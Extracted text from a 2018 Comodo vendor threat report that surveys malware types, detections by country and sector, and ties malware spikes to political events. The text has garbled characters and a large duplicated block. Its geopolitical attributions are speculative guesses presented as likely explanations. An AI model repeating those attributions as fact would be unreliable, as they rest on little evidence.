6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
